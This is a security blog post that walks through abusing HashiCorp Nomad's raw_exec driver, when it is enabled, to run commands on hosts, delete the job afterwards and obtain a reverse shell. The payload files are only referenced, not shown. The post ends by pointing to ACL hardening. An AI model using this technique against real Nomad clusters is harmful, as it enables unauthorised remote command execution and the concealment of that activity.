Monday, December 16, 2019

Devoops: Nomad with raw_exec enabled

"Nomad is a flexible container orchestration tool that enables an organization to easily deploy and manage any containerized or legacy application using a single, unified workflow. Nomad can run a diverse workload of Docker, non-containerized, microservice, and batch applications, and generally offers the following benefits to developers and operators..."


To get a feel for where it fits in the HashiCorp ecosphere take a look at the following graphic:

I'd like to thank Will Butler for letting me write this up after watching him pwn it.

You can get a dev environment up and running using the tutorial here:

The walkthru has you run it as a dev environment which wont bind to so you'll need the following server and client files to get an appropriate environment up and running after you Vagrant up.


If you get everything up and running correctly you should be able to connect to the UI on port 4646 and see the example job

$ nomad job run example.nomad
==> Monitoring evaluation "ac9b4b08"
    Evaluation triggered by job "example"
    Evaluation within deployment: "8a7dfe0f"
    Allocation "57e65abe" created: node "a15034e5", group "cache"
    Evaluation status changed: "pending" -> "complete"

==> Evaluation "ac9b4b08" finished with status "complete"

jobs in the nomad UI

servers in the nomad UI

clients in the nomad UI

Leveraging misconfiguration time. Nomad ships with a raw_exec option that is disabled by default.

the raw_exec option allow you to run a command outside isolation on the nomad host.  

"The raw_exec driver can run on all supported operating systems. For security reasons, it is disabled by default. To enable raw exec, the Nomad client configuration must explicitly enable the raw_exec driver in the client's options:"

How can you see if the raw_exec module is enabled on the clients?

You can check it out it the UI:

or by hitting the API endpoint

Let's exploit this thing.

We need to create a job hcl file with our commands. Here is gist with a simple one:

starting the service

Results of our job

job in the UI

Stopping the job

forcefully run the garbage collection

validation the job was deleted

OK let's get a reverse shell. I used the following hcl file:

Reverse shell job

Shell from nomad


Info on locking nomad down via ACLs: